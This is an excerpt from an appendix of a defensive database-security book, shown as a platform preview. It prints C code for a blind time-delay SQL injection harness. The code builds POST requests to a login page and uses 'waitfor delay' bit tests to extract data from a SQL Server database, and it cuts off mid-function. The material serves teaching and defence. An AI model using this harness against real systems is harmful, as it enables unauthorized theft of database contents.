APPENDIX A
Example C Code for a Time-Delay SQL Injection Harness
int main( int argc, char *argv[] ) { int i, t; HANDLE h_thread[32]; memset( out, 0, 1024 * 64 ); if ( argc != 4 ) return syntax(); query = argv[1]; bit_start = atoi( argv[2] ); bit_end = atoi( argv[3] ); for( i = bit_start; i < bit_end; i += 1 ) { for( t = 0; t < 1; t++ ) { h_thread[t] = (HANDLE)_beginthread( thread_proc, 0, (void *)(i+t) ); } if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000 ) == WAIT_TIMEOUT ) {
printf( "Error - timeout waiting for response\n" ); return 1; } if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8) - 1 ] == 0 ) ) { printf("Done!\n"); return 0; } } return 0; } int create_get_bit_request( char *query, int bit, char *request, int buff_len ) { char params[ 1024 * 64 ] = ""; char content_length[32] = ""; char tmp[32] = ""; char query_string[1024 * 64] = ""; int i; // create bit-retriveal query string safe_strcat( query_string, "'; ", buff_len ); safe_strcat( query_string, query, buff_len ); sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2, %d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 ); safe_strcat( query_string, params, buff_len ); params[0] = 0; safe_strcat( request, "POST /login.asp HTTP/1.1\r\n", buff_len ); safe_strcat( request, "Content-Type: application/x-www-form- urlencoded\r\n", buff_len ); safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n", buff_len ); safe_strcat( request, "Host: 192.168.0.1\r\n", buff_len ...
Get The Database Hacker's Handbook: Defending Database Servers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.